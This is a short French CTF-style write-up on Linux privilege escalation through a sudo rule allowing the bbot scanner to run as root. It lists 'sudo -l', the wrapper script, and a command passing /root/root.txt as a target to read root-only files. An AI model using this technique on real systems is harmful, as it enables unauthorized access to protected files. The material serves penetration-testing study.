Sudo (bbot binary) - Linux Privilege Escalation

Sudo - bbot (binary)

Vérification des droits sudo :

sudo -l

L’utilisateur peut exécuter /usr/local/bin/bbot en root.

Contenu de /usr/local/bin/bbot :

#!/opt/pipx/venvs/bbot/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from bbot.cli import main
if __name__ == '__main__':
    sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
    sys.exit(main())

Exploitation :

Ce script transmet simplement les arguments à la fonction principale de bbot. Comme nous pouvons contrôler les arguments fournis, nous pouvons exploiter une fonctionnalité de bbot pour lire n’importe quel fichier — y compris ceux qui sont accessibles uniquement par l’utilisateur root.

Après avoir consulté l’aide ou la documentation d’utilisation de bbot, nous avons identifié des options permettant de spécifier un fichier cible ainsi qu’un répertoire de sortie :

sudo /usr/local/bin/bbot -t /root/root.txt -o /tmp/root -d

Explication :

-t /root/root.txt : définit le fichier cible à traiter.
-o /tmp/root : spécifie le répertoire de sortie (là où les résultats seront stockés).
-d : active le mode débogage, au cas où des informations supplémentaires seraient nécessaires.

Comme le script s’exécute avec les privilèges root et qu’aucune validation des entrées n’est effectuée, cela nous permet de lire des fichiers arbitraires, y compris le fichier final contenant le flag root.

Mis à jour il y a 7 mois

Ce contenu vous a-t-il été utile ?